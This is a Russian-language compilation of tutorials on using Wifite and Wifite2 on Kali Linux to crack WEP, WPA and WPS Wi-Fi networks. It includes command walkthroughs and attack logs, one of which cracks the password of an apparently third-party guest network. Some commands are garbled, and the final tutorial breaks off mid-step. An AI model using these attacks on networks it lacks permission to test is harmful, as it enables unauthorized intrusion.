Установка настройка и использование Wifite на Kali Linux
В статье «Актуальные способы взлома WiFi», мы рассказывали о всех рабочих методах взлома в WiFi-сетей. Сегодня продолжим тему вардрайвинга (поиск и взлом точек доступа WiFi) и познакомимся с инструментом Wifite. Я покажу, как установить и использовать Wifite.
Часто при проведении пентеста у нас есть несколько точек доступа Wi-Fi для проверки безопасности. Вместо того, чтобы тестировать каждый из них по отдельности с помощью таких инструментов, как aircrack-ng, Reaver, pyrit, hcxdumptool и других, мы можем автоматизировать это тестирование с помощью одного инструмента, такого как Wifite.
Автоматизация взлома WiFi-сетей с помощью Wifite
Wifite — это инструмент для автоматизации взлома паролей Wi-Fi, который использует почти все известные методы взлома WiFi, такие как атака Pixie-Dust, брутфорс PIN, атака NULL PIN, захват рукопожатия WPA + офлайн-взлом, PMKID Hash Capture + офлайн-взлом и различные техники взлома WEP.
Установка Wifite
Wifite по умолчанию установлен в Kali Linux. Если используете другой дистрибутив или у вас по какой-то причине не установлен Wifite, тогда с помощью следующей команду устанавливаем Wifite:
sudo apt install wifite
Команды Wifite
Вот список команд Wifite:
wifite — запустить Wifite со стандартными параметрами .
wifite — help — отобразить справку и список доступных опций .
wifite — all — попытаться взломать все доступные сети .
wifite — mac — попытаться взломать конкретную сеть с указанным BSSID ( MAC -адресом точки доступа ) .
wifite — wep — взломать только сети с защитой WEP .
wifite — wpa — взломать только сети с защитой WPA / WPA2 .
wifite — wps — взломать только сети с включенной функцией WPS ( Wi — Fi Protected Setup ) .
wifite — dict < файл >— использовать пользовательский словарь паролей для атаки на сети .
wifite — crack — принудительно попытаться взломать пароль сети , даже если успешно получен хэндшейк .
wifite — pmkid — попытаться взломать сеть , используя PMKID атаку .
wifite — no — reaver — отключить использование Reaver при атаке на WPS .
wifite — kill — отключить все процессы мониторинга перед запуском .
Статья в образовательных целях и предназначается для обучения этичных хакеров. При написании статьи использовались личные устройства автора. Использование Wifite для несанкционированного доступа к чужим сетям без разрешения является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Использование Wifite
Как и любой другой инструмент для взлома пароля беспроводной сети, Wifite необходимо перевести WiFi в режим монитора. После запуска тулза делает это сама, но если это не произошло, можно сделать это вручную:
sudo start wlan0
Давайте посмотрим, сможет ли Wifite взломать сети с WEP, WPA и WPS.
Я всегда рекомендую начинать знакомство со справки:
sudo wifite — h
Теперь запустите Wifite:
sudo wifite
Если будут проблемы с запуском, попробуйте запустить тулзу с директивой — kill , она остановит конфликтующие процессы.
sudo wifite — kill
После запуска и сканирования эфира, появится список WiFi-сетей:
Прерываем сканирование нажав на сочетание клавиш CTRL + C и выбираем сеть. Для взлома я выбрал свою точку доступа «Hack_Me_If_You_Can», в которой включена защита WEP.
Как только вы введете ID сети (в моем случае — это «1»), Wifite начнет атаку.
Сеть взломана. WEP — это просто. Посмотрим, как он справится со взломом пароля WPA.
Запускаем Wifite как показано выше. Наша цель снова моя сеть «Hack_Me_If_You_Can». Однако, как видите, теперь она защищена с помощью WPA.
Тулза начинает атаковать сеть, используя различные способы взлома WiFi. Удается перехватить хендшейк. После перехвата хендшейка Wifite пытается подобрать пароль использую словарь для брута по умолчанию wordlist-portable.txt.
Теперь давайте попробуем взломать точку доступа с включенным WPS.
WPS пин найден. Сеть взломана!
Заключение
Как видите, Wifite успешно взламывает WEP, WPA и WPS автоматически без выполнения каких-либо сложных команд.
Автоматизация атак на Wi-Fi сети при помощи Wifite2
В этой статье будет рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi.
Существует множество методов компрометирования Wi-Fi сетей. Сложность реализации того или иного сценария зависит от типа шифрования, настроек производителя, количества подключенных клиентов и так далее. В этой статье будет рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi. Wifite2 позволяет выбрать перечень целей и наметить наилучшую стратегию взлома каждой сети. Wifite2 и Wifite Wifite был одним из первых инструментов для автоматизированного взлома Wi-Fi, с которым я познакомился. Вместе с Besside-ng, представляющим собой набором скриптов для автоматизации атак на Wi-Fi, даже новичок мог реализовать атаку с серьезными последствиями без необходимости вникать в суть работы этих инструментов. По сравнению с Besside-ng в Wifite было предусмотрено множество разных сценариев, что, впрочем, могло замедлять работу в некоторых случаях. Одной из наиболее полезных фишек Wifite был предварительный анализ, позволяющий выбрать одну или несколько близлежащих сетей в качестве целей. Сортируя доступные цели по различным признакам, даже начинающий мог разобраться, какой сценарий атаки сработает наилучшим образом. Первая версия Wifite могла автоматически атаковать сети, поддерживающие протокол WPA, посредством перехвата рукопожатий или при помощи утилиты Reaver для перебора пина, установленного в WPS (Wi-Fi Protected Setup; Защищенная установка). Этот метод был эффективен, но отнимал около 8 часов и более. Новая версия WiFite2 работает намного быстрее. Атаки стали занимать меньше времени, а тактика стала более изощренной, чем в предыдущей версии. Таким образом, Wifite2 стал серьезнее и мощнее на поприще взлома Wi-Fi по сравнению с Wifite. Сценарий атаки на Wi—Fi В Wifite2 реализован простой, но эффективный, алгоритм для максимально быстрого взлома близлежащих сетей. Каждая тактика притворяется в жизнь до разумного предела, но иногда дело доходит до взлома каждого полученного рукопожатия. Вначале Wifite2 сканирует все каналы в указанном диапазоне на предмет наличия сетей. Полученный список сортируется по силе сигнала, поскольку надежная связь с обнаруженной сетью совсем не гарантируется. Сортировка по убыванию силы сигнала позволяет наметить подходящий сценарий для каждой конкретной сети. Логика работы Wifite2 позволяет использовать этот инструмент вместе с направленной Wi-Fi антенной для обнаружения источника каждой близлежащей сети во время исследования окружающего пространства. После того как окружающая территория исследована по каждой сети показываются подключенные клиенты, есть ли WPS, и какой используется тип шифрования. На базе полученной информации злоумышленник может выбрать один объект, группу или сразу все сети в качестве целей для атаки. Далее Wifite2 пробегает по списку целей и вначале пытается реализовать наиболее быстрые и простые сценарии, как, например, WPS-Pixie, когда пароль взламывается в течение секунд, а затем менее надежные тактики, связанные с перебором паролей по словарю. Если атака терпит неудачу или занимает слишком много времени, Wifite2 переходит к следующему сценарию вместо бесполезной траты времени, как при работе с Wifite. https://www.youtube.com/watch?v=qpnpI_mF3Aw Подготовка и пошаговая реализация Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Рекомендую установить этот дистрибутив или на виртуальной машиной или прямо на компьютере с обновлением загрузочной записи и возможностью выбора операционной системы. В целом, Wifite2 можно установить в любом другом дистрибутиве, но я предполагаю, что у вас Kali Linux. Шаг 1. Установка Wifite2 Если Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. В терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции. git clone https://github.com/derv82/wifite2.git cd wifite2 sudo python setup.py install Теперь Wifite2 должен быть установлен в вашей системе. Введите команду wifite —h для получения информации о текущей версии. wifite -h . . .´ · . . · `. wifite 2.1.6 : : : (¯) : : : automated wireless auditor `. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2 ` /¯¯¯\ ´ optional arguments: -h, —help show this help message and exit SETTINGS: -v, —verbose Shows more options (-h -v). Prints commands and outputs. (default: quiet) -i [interface] Wireless interface to use (default: choose first or ask) -c [channel] Wireless channel to scan (default: all channels) -mac, —random-mac Randomize wireless card MAC address (default: off) -p [scantime] Pillage: Attack all targets after scantime seconds —kill Kill processes that conflict with Airmon/Airodump (default: off) —clients-only, -co Only show targets that have associated clients (default: off) —nodeauths Passive mode: Never deauthenticates clients (default: deauth targets) WEP: —wep Filter to display only WEP-encrypted networks (default: off) —require-fakeauth Fails attacks if fake-auth fails (default: off) —keep-ivs Retain .IVS files and reuse when cracking (default: off) WPA: —wpa Filter to display only WPA-encrypted networks (includes WPS) —new-hs Captures new handshakes, ignores existing handshakes in ./hs (default: off) —dict [file] File containing passwords for cracking (default: /usr/share/wordlists/fern-wifi/common.txt) WPS: —wps Filter to display only WPS-enabled networks —bully Use bully instead of reaver for WPS attacks (default: reaver) —no-wps NEVER use WPS attacks (Pixie-Dust) on non-WEP networks (default: off) —wps-only ALWAYS use WPS attacks (Pixie-Dust) on non-WEP networks (default: off) EVIL TWIN: -ev, —eviltwin Use the «Evil Twin» attack against all targets (default: off) COMMANDS: —cracked Display previously-cracked access points —check [file] Check a .cap file (or all hs/*.cap files) for WPA handshakes —crack Show commands to crack a captured handshake Шаг 2. Подключение Wi—Fi карты После установки Wifite2 нужно подключить беспроводной сетевой адаптер, совместимый с Kali Linux. Wifite2 умеет не только автоматически выбирать адаптер, но и переключает карту в режим мониторинга. То есть, после подключения адаптера не нужно заботиться о настройке. Шаг 3. Настройка параметров и поиск целей Если мы знаем, в каком канале планируется реализация атаки, то можем указать номер вместе с параметром –c. Альтернативный вариант: просто ввести команду wifite и начать сбор информации по всем доступным сетям. wifite -c 11 . . .´ · . . · `. wifite 2.1.6 : : : (¯) : : : automated wireless auditor `. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2 ` /¯¯¯\ ´ [+] option: scanning for targets on channel 11 [!] conflicting process: NetworkManager (PID 464) [!] conflicting process: wpa_supplicant (PID 729) [!] conflicting process: dhclient (PID 13595) [!] if you have problems: kill -9 PID or re-run wifite with —kill) [+] looking for wireless interfaces Interface PHY Driver Chipset ———————————————————————— 1. wlan0 phy3 ath9k_htc Atheros Communications, Inc. AR9271 802.11n [+] enabling monitor mode on wlan0. enabled wlan0mon NUM ESSID CH ENCR POWER WPS? CLIENT — ————————- — —- —— —- —— 1 Suicidegirls 11 WPA 48db no 2 Bourgeois Pig Guest 11 WPA 45db no 3 BPnet 11 WPA 42db no 4 DirtyLittleBirdyFeet 11 WPA 32db no 5 5 ATT73qDwuI 11 WPA 32db yes 6 SpanishWiFi 11 WPA 24db no 7 Franklin Lower 11 WPA 20db no 3 8 Sonos 11 WPA 11db no 9 Villa Carlotta 11 WPA 11db no 10 Sonos 11 WPA 10db no [+] select target(s) (1-10) separated by commas, dashes or all: При помощи команды выше мы запустили сканирование на канале 11 и получили список из 10 целей. У двух сетей есть подключенные клиенты, у одной включен WPS и во всех используется протокол WPA. Шаг 4. Исследование окружающей территории и выбор целей Из списка выше мы делаем вывод, что атака на цель под номером 5 будет реализована в первую очередь. Сигнал не самый сильный, и нет клиентов, однако при помощи новой атаки PMKID, вероятно, мы сможем получить рукопожатие, даже если никто не подключен. Слабые пароли разумнее искать у первых трех сетей с самым сильным сигналом. У целей 4 и 7 наиболее высокие шансы использования 4-этапного рукопожатия, но брутфорс попробуем позже. Сети 4, 5 и 7 являются для нас наиболее желанными с точки зрения вероятности перехвата и взлома быстрого рукопожатия, если вначале не будет взломан пин, используемый в WPS. Если мы хотим сосредоточиться на легкодоступных целях, то можем задать в скрипте отображение сетей, уязвимых к конкретным атакам. Например, используя флаг –wps для поиска сетей с WPS, которые могут быть уязвимы к атакам при помощи утилиты Reaver или Bully. wifite -wps . . .´ · . . · `. wifite 2.1.6 : : : (¯) : : : automated wireless auditor `. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2 ` /¯¯¯\ ´ [+] option: targeting WPS-encrypted networks [!] conflicting process: NetworkManager (PID 464) [!] conflicting process: wpa_supplicant (PID 729) [!] conflicting process: dhclient (PID 14824) [!] if you have problems: kill -9 PID or re-run wifite with —kill) [+] looking for wireless interfaces Interface PHY Driver Chipset ———————————————————————— 1. wlan0 phy4 ath9k_htc Atheros Communications, Inc. AR9271 802.11n [+] enabling monitor mode on wlan0. enabled wlan0mon NUM ESSID CH ENCR POWER WPS? CLIENT — ————————- — —- —— —- —— 1 SBG6580E8 1 WPA 45db yes 2 The Daily Planet 1 WPA 30db yes 1 3 ATT73qDwuI 11 WPA 28db yes 4 birds-Wireless 2 WPA 23db yes [+] select target(s) (1-4) separated by commas, dashes or all: Схожий смысл имеют флаги —wpa или –wep, позволяющие найти цели с соответствующим типом шифрования. Шаг 5. Автоматические атаки на однотипные цели Из полученного списка выберем цели с WPS и подключенными клиентами. После выбора сетей Wifite2 пытается реализовать наиболее целесообразный сценарий: [+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet) [+] The Daily Planet (76db) WPS Pixie-Dust: [—78s] Failed: Timeout after 300 seconds [+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45 [+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1, deauth:11s, timeout:7m59s) [+] successfully captured handshake [+] saving copy of handshake to hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96 [!] pyrit: .cap file does not contain a valid handshake [+] cowpatty: .cap file contains a valid handshake for (The Daily Planet) [+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96 [+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist [!] Failed to crack handshake: common.txt did not contain password [+] Finished attacking 1 target(s), exiting По логам выше видно, что атака WPS-Pixie завершилась неудачно, но мы смогли перехватить рукопожатие. Время на атаку WPS-Pixie быстро закончилось, и мы потратили минимум ресурсов на проверку успешности этого сценария. Иногда, некоторые беспроводные карты лучше работают с разными инструментами (то же самое касается утилит Reaver и Bully). Если в вашем случае одно не работает, попробуйте другое. По умолчанию Wifite2 использует Reaver, но вы можете поменять на Bully, указав флаг –bully. wifite -wps -bully . . .´ · . . · `. wifite 2.1.6 : : : (¯) : : : automated wireless auditor `. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2 ` /¯¯¯\ ´ [+] option: use bully instead of reaver for WPS Attacks [+] option: targeting WPS-encrypted networks [!] conflicting process: NetworkManager (PID 464) [!] conflicting process: wpa_supplicant (PID 729) [!] conflicting process: dhclient (PID 14824) [!] if you have problems: kill -9 PID or re-run wifite with —kill) [+] looking for wireless interfaces using interface wlan0mon (already in monitor mode) you can specify the wireless interface using -i wlan0 NUM ESSID CH ENCR POWER WPS? CLIENT — ————————- — —- —— —- —— 1 SBG6580E8 1 WPA 46db yes 2 The Daily Planet 1 WPA 34db yes 1 [+] select target(s) (1-2) separated by commas, dashes or all: 2 [+] (1/1) starting attacks against 78:96:84:00:B5:B0 (The Daily Planet) [+] The Daily Planet (44db) WPS Pixie-Dust: [4m0s] Failed: More than 100 timeouts [+] The Daily Planet (34db) WPA Handshake capture: found existing handshake for The Daily Planet [+] Using handshake from hs/handshake_TheDailyPlanet_78-96-84-00-B5-B0_2018-12-24T00-33-18.cap [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for 78:96:84:00:b5:b0 [!] pyrit: .cap file does not contain a valid handshake [+] cowpatty: .cap file contains a valid handshake for (The Daily Planet) [+] aircrack: .cap file contains a valid handshake for 78:96:84:00:B5:B0 [+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist [!] Failed to crack handshake: common.txt did not contain password [+] Finished attacking 1 target(s), exiting В нашем примере мы не смогли что-то улучшить при помощи Bully, но всегда нужно пробовать оба метода. Шаг 6. Сохранение и анализ результатов Если Wifite2 «увяз» в одном из сценариев, то всегда можно нажать Ctrl—C, после чего появится меню с вопросом, хотим ли мы продолжить или остановить процесс. [+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (DeAuth:Timeout) (Timeouts:15) [!] interrupted [+] 1 attack(s) remain, do you want to continue? [+] type c to continue or s to stop: Например, если мы смогли лишь получить 4-этапное рукопожатие, то, вероятно, захотим перебрать пароли, указав флаг –dict и путь к словарю. По умолчанию используется словарь /usr/share/wordlists/fern-wifi/common.txt. Этот список содержит наиболее распространенные пароли, но вы можете использовать свой перечень, если настроены серьезно на получение результатов. Ниже показан пример успешной дешифровки перехваченного рукопожатия при помощи нестандартного словаря «passwords.txt». wifite -wpa —dict ./passwords.txt . . .´ · . . · `. wifite 2.1.6 : : : (¯) : : : automated wireless auditor `. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2 ` /¯¯¯\ ´ [+] option: using wordlist ./passwords.txt to crack WPA handshakes [+] option: targeting WPA-encrypted networks [!] conflicting process: NetworkManager (PID 419) [!] conflicting process: wpa_supplicant (PID 585) [!] conflicting process: dhclient (PID 7902) [!] if you have problems: kill -9 PID or re-run wifite with —kill) [+] looking for wireless interfaces using interface wlan0mon (already in monitor mode) you can specify the wireless interface using -i wlan0 NUM ESSID CH ENCR POWER WPS? CLIENT — ————————- — —- —— —- —— 1 Suicidegirls 11 WPA 58db n/a 2 Bourgeois Pig Guest 11 WPA 56db n/a 3 BPnet 11 WPA 56db n/a 4 The Daily Planet 1 WPA 49db n/a 1 5 SBG6580E8 1 WPA 49db n/a 6 Hyla Hair 2.4G 8 WPA 48db n/a 7 TWCWiFi-Passpoint 1 WPA 46db n/a 8 HP-Print-B9-Officejet. 1 WPA 40db n/a 9 birds-Wireless 2 WPA 39db n/a 10 SpanishWiFi 11 WPA 38db n/a [!] Airodump exited unexpectedly (Code: 0) Command: airodump-ng wlan0mon -a -w /tmp/wifitei_l5H1/airodump —write-interval 1 —output-format pcap,csv [+] select target(s) (1-10) separated by commas, dashes or all: 2 [+] (1/1) starting attacks against DE:F2:86:EC:CA:A0 (Bourgeois Pig Guest ) [+] Bourgeois Pig Guest (57db) WPA Handshake capture: Discovered new client: F0:D5:BF:BD:D5:2B [+] Bourgeois Pig Guest (58db) WPA Handshake capture: Discovered new client: 6C:8D:C1:A8:E4:E9 [+] Bourgeois Pig Guest (59db) WPA Handshake capture: Listening. (clients:2, deauth:14s, timeout:8m1s) [+] successfully captured handshake [+] saving copy of handshake to hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap saved [+] analysis of captured handshake file: [+] tshark: .cap file contains a valid handshake for de:f2:86:ec:ca:a0 [!] pyrit: .cap file does not contain a valid handshake [+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest ) [+] aircrack: .cap file contains a valid handshake for DE:F2:86:EC:CA:A0 [+] Cracking WPA Handshake: Using aircrack-ng via passwords.txt wordlist [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key: christmasham) [+] Cracked WPA Handshake PSK: christmasham [+] Access Point Name: Bourgeois Pig Guest [+] Access Point BSSID: DE:F2:86:EC:CA:A0 [+] Encryption: WPA [+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap [+] PSK (password): christmasham [+] saved crack result to cracked.txt (1 total) [+] Finished attacking 1 target(s), exiting Используя хороший словарь, мы можем увеличить шансы на взлом пароля, даже если быстрые атаки на сети с WPS завершатся неудачно. Предупреждение об ответственности и методы защиты Wifite2 – очень хороший пример, когда даже новичок может реализовать эффективную атаку на сети, обладающие наиболее распространенными уязвимостями, как, например, пин в WPS или слабые пароли. С увеличением уровня автоматизации более продвинутых атак, важно быть в тренде и знать наиболее эффективные методы взлома Wi-Fi сетей. В целом, наилучший способ защитить сеть от утилит наподобие Wifite2 – отключить WPS и использовать сильный пароль, который знает ограниченный круг лиц. Важно отметить, что, если выбрать все цели, Wifite2 будет осуществлять атаки на все сети, а не только на которые у вас есть разрешение «тестировать». Если у вас нет разрешения на реализацию атаки, то, по сути, вы становитесь на путь криминала и можете попасть в серьезные неприятности. Отговорки навроде «атаку осуществил скрипт» не прокатят. Особенно если речь идет о каких-то серьезных и важных сетях. Надеюсь, вам понравилось это руководство. Любые мнения и вопросы можете оставлять в комментариях. Также со мной можно связаться через Твиттер @KodyKinzie.
Устали от того, что Интернет знает о вас все? Присоединяйтесь к нам и станьте невидимыми!
Инструменты Kali Linux
Список инструментов для тестирования на проникновение и их описание
WiFite
Описание WiFite
Инструмент автоматизированной беспроводной атаки.
Wifite работает только на Linux.
Wifite был создан для использования с дистрибутивами на тестирование на проникновение, такими как Kali Linux, Pentoo, BackBox; любыми дистрибутивами Linux с пропатченным для инжекта беспроводными драйверами. По видимому, также работает на Ubuntu, Debian и Fedora.
Wifite должна быть запущена от рута. Это требуется набором программ, который она использует. Запуск загруженных скриптов от рута — это плохая идея. Я рекомендую использовать загрузочный Kali Linux Live CD, загрузочную флешку USB (для тестирования на проникновение) или виртуальную машину. Помните, что виртуальные машины не могут напрямую иметь доступ к железу, поэтому требуется беспроводной USB адаптер.
Wifite предполагает, что у вас есть беспроводная карта и подходящие драйверы, пропатченные для инжекта и неразборчивого режима/режима наблюдения.
Инструмент может атаковать множество зашифрованных сетей WEP, WPA и WPS подряд. Этот инструмент настраивается до автоматизма всего лишь несколькими аргументами. Цель Wifite — быть инструментом беспроводного аудита по принципу «установил и забыл».
- сортирует цели по сигналу (в dB); первыми взламывает самые близкие точки доступа
- автоматически деаутентифицирует клиентов скрытых сетей для раскрытия их SSID
- набор фильтров для точного указания, что именно атаковать (wep/wpa/обе, выше определённой силы сигнала, каналы и т.д.)
- гибкие настройки (таймауты, пакеты в секунду, другое)
- функции «анонимности»: смена MAC на случайный адрес перед атакой, затем обратная смена, когда атака завершена
- все захваченные рукопожатия WPA копируются в текущую директорию wifite.py
- умная деаутентификация WPA; циклы между деаутентификацией всех клиентов и широковещательной
- остановка любого взлома по Ctrl+C с опциями для продолжения, переход к следующей цели, пропуск взлома или выход
- отображение общей информации по сессии при выходе; показ всех взломанных ключей
- все пароли сохраняются в cracked.txt
Автор: derv merkler
Справка по WiFite
опциональные аргументы: -h, --help показать справку и выйти НАСТРОЙКИ: -i [interface] Беспроводной интерфейс для использования (по умолчанию: спрашивать) -c [channel] Беспроводные каналы для сканирования (по умолчанию: все каналы) -5, --5ghz Включая 5Ghz каналы (по умолчанию: выключено) -b [bssid] BSSID (например, AA:BB:CC:DD:EE:FF) точки доступа для атаки -e [essid] ESSID (имя) точки доступа для атаки -v, --verbose Вербальный режим, печатать все строки (по умолчанию: тихий) WEP: --wep Показывать только сети с шифрованием WEP (по умолчанию: выключено) --require-fakeauth Атака не удалась, если не удалась фальшивая аутентификация (по умолчанию: выключено) --pps [pps] Пакетов в секунду для восроизведения (по умолчанию: 600 pps) --wept [секунды] Ожидать секунд перед неудачей (по умолчанию: 600 секунд) --wepca [ivs] Запустить взлом на этом количестве IVs (по умолчанию: 10000 ivs) --weprs [секунды] Перезапустить aireplay если не появляются новые IVs (по умолчанию: 11 секунд) --weprc [секунды] Перезапустить aircrack после этой задержки (по умолчанию: 30 секунд) --arpreplay Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено) --fragment Использовать атаку WEP фрагментации (по умолчанию: включено) --chopchop Использовать WEP атаку чоп-чоп (по умолчанию: включено) --caffelatte Использовать WEP атаку Кафе латте (по умолчанию: включено) --p0841 Использовать WEP атаку p0841 (по умолчанию: включено) --hirte Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено) WPA: --wpa Показывать только сети с WPA шифрованием (включая WPS) --wpadt [секунды] Время ожидания перед отправкой деаутентификации (по умолчанию: 10 секунд) --wpat [секунды] Время ожидания, чтобыб признать атаку WPA неудачной (по умолчанию: 500 секунд) --hs-dir [dir] Директория для сохранения рукопожатий files (по умолчанию: hs) --dict [файл] Файл, содержащий пароли для взлома (по умолчанию: None) --strip Очистить ненужные пакеты из захваченного рукопожатия используя tshark или pyrit WPS: --wps Показывать только сети с WPS --reaver Использовать ТОЛЬКО Reaver на WPS сетях (по умолчанию: выключено) --no-reaver НЕ использовать Reaver на WPS сетях (по умолчанию: выключено) --pixie Использовать только атаку WPS Pixie-Dust (по умолчанию: выключено) --pixiet [секунды] Время ожидания перед признанием атаки PixieDust неудачной (по умолчанию: 300 секунд) --pixiest [секунды] Время ожидания для шага прогресса перед признанием атаки PixieDust неудачной (по умолчанию: 30 секунд) --wpst [секунды] Время ожидания перед признанием атаки WPS PIN неудачной (по умолчанию: 600 секунд) --wpsmr [попытки] Максимальное количество попыток перед признанием неудачи (по умолчанию: 20) --wpsmf [fails] Максимальное число неудач Reaver перед признанием атаки провалившейся (по умолчанию: 30) --wpsmt [timeouts] Максимальное количество таймаутов перед остановкой (по умолчанию: 30) --ignore-ratelimit Игнорировать атаку, если WPS ограничен по скорости (по умолчанию: включено) КОМАНДЫ: --cracked Показать ранее взломанные точки доступа --check [file] Проверить .cap файлы (или все hs/*.cap файлы) на WPA рукопожатия
Руководство по WiFite
Страница man отсутствует.
Примеры запуска WiFite
Атаковать точки доступа с мощностью более 50 dB (-pow 50), используя атаку WPS (-wps):
root@kali:~# wifite -pow 50 -wps .;' `;, .;' ,;' `;, `;, WiFite v2 (r85) .;' ,;' ,;' `;, `;, `;, :: :: : ( ) : :: :: automated wireless auditor ':. ':. ':. /_\ ,:' ,:' ,:' ':. ':. /___\ ,:' ,:' designed for Linux ':. /_____\ ,:' / \ [+] targeting WPS-enabled networks [+] scanning for wireless devices. [+] enabling monitor mode on wlan0. done [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
Установка WiFite
Программа предустановлена в Kali Linux, дополнительно установите программы:
Установка в Linux
- Python. Wifite — это скрипт на Python и для запуска требуется Python, программа совместима с версиями python2 и python3.
- iwconfig: Для определения, находятся ли беспроводные интерфейсы уже в режиме монитора.
- ifconfig: Для запуска/остановки беспроводных устройств
- Набор aircrack-ng. Используются конкретно следующие программы:
- airmon-ng: Для перечисления и включения Режима Мониторар на беспроводных интерфейсах.
- aircrack-ng: Для взлома WEP .cap файлов и захваченных WPA рукопожатий.
- aireplay-ng: Для деаутентификации Точек Доступа, повторного вопроизведения файлов захвата, различных WEP аттак.
- airodump-ng: Для сканирования целей и генерации файлов захвата.
- packetforge-ng: Для подделки файлов захвата.
Необязательные, но рекомендуемые зависимости:
- Reaver, предназначен для подборки пина WPS (Wifi Protected Setup) методом перебора. Reaver включает сканер «walsh» (или «wash») для выявления точек доступа с включённым WPS. Wifite использует Reaver сканирования и для атаки на роутеры с включённым WPS.
- Pyrit, взломщик ключей WPA PSK, используя графический процессор. Wifite использует Pyrit (если нашла) для выявления хендшейков. В будущем Wifite может получить опцию взламывать хендшейки WPA с помощью Pyrit.
- tshark. Поставляется в связке с Wireshark, программным обеспечением для сниффинга пакетов.
- coWPAtty, взломщик ключей WPA PSK. Wifite использует cowpatty (если нашла) для выявления рукопожатий.
- Pixiewps, это инструмент, написанный на C, он используется для оффлайн брутфорса пина WPS посредством эксплуатирования низкой или несуществующий энтропии некоторых точек доступа (атака pixie dust).
После установки зависимостей, установка самой WiFite очень проста:
git clone https://github.com/derv82/wifite2.git cd wifite2/ sudo ./Wifite.py --help
Скриншоты WiFite
Особенности работы с WiFite v2.00
Где WiFite сохраняет захваченные рукопожатия?
WiFite предыдущих версий сохраняла их в текущую рабочую директорию. В Kali Linux это обычно /root/
WiFite v2.00 сохраняет рукопожатия в директорию hs, которая находится внутри директории с установленной программой, например: /usr/share/wifite/hs/
Это можно поменять опцией —hs-dir, после которой укажите желаемую директорию для сохранения рукопожатий.
[!] cowpatty: .cap file does not contain a valid handshake
Если у вас постоянно возникает ошибка
[!] cowpatty: .cap file does not contain a valid handshake
то она связана с тем, что WiFite v2.00 проверяет валидность рукопожатия сразу в четырёх программах, и программа cowpatty даже для верных рукопожатий пишет, что они недействительны. Для отключения проверки рукопожатия с помощью cowpatty в WiFite v2.00, найдите файл Handshake.py
[mial@HackWare ~]$ locate Handshake.py /usr/share/wifite/py/Handshake.py
Откройте его для редактирования:
sudo gedit /usr/share/wifite/py/Handshake.py
pairs = self.cowpatty_handshakes() Handshake.print_pairs(pairs, self.capfile, 'cowpatty')
и закомментируйте их, чтобы получилось так:
# pairs = self.cowpatty_handshakes() # Handshake.print_pairs(pairs, self.capfile, 'cowpatty')
Быстрое завершение с key unknown
Если WiFite v2.00 получает рукопожатие, но быстро завершает свою работу с сообщением:
[!] key unknown
То для того, чтобы она начала взламывать полученное рукопожатие, а не просто прекращала работу, нужно указать путь до словаря с опцией —dict.
Инструкции по WiFite
- WiFite: программа для реализации комплексных (WPA / WPA2, WEP, WPS) автоматизированных атак на Wi-Fi в Kali Linux
- Поиск беспроводных точек доступа с включённым WPS: использование программ Wash, Airodump-ng и Wifite
- Лучшая Wi-Fi карта для Kali Linux
- Подборка совместимых с Kali Linux Wi-Fi адаптеров на 2017
Взлом Wi-Fi-сетей, защищённых WPA и WPA2
Автор статьи, перевод которой мы сегодня публикуем, хочет рассказать о том, как взломать Wi-Fi-сеть, для защиты которой используются протоколы WPA и WPA2.
Статья написана исключительно в ознакомительных целях
Аппаратное и программное обеспечение
Я буду пользоваться дистрибутивом Kali Linux, установленным на VMware Workstation.
Кроме того, в моём распоряжении имеется Wi-Fi-адаптер Alfa AWUS036NH 2000mW 802.11b/g/n. Вот его основные характеристики:
- Стандарты: IEEE 802.11b/g/n, USB 2.0.
- Скорости передачи данных: 802.11b — 11 Мбит/с, 802.11g — 54 Мбит/с, 802.11n — 150 Мбит/с.
- Разъём для подключения антенны: 1 x RP-SMA.
- Частотные диапазоны: 2412~2462 МГц, 2412~2472 МГц, 2412~2484 МГц.
- Питание: 5В.
- Безопасность: WEP 64/128, поддержка 802.1X, WPS, WPA-PSK, WPA2.
Шаг 1
Нужно запустить Kali Linux в VMware и подключить к системе Wi-Fi-адаптер Alfa AWUS036NH, выполнив следующую последовательность действий:
VM > Removable Devices > Ralink 802.11n USB Wireless Lan Card > Connect
Подключение Wi-Fi-адаптера к ОС, работающей в VMware
Шаг 2
Теперь обратите внимание на средства управления Wi-Fi-подключениями в Kali Linux.
Управление Wi-Fi-подключениями в Kali Linux
Шаг 3
Откройте терминал и выполните команду airmon-ng для вывода сведений об интерфейсах беспроводных сетей.
Вывод сведений об интерфейсах беспроводных сетей
Шаг 4
Как видно, интерфейсу назначено имя wlan0 . Зная это, выполним в терминале команду airmon-ng start wlan0 . Благодаря этой команде Wi-Fi-адаптер будет переведён в режим мониторинга.
Перевод адаптера в режим мониторинга
Шаг 5
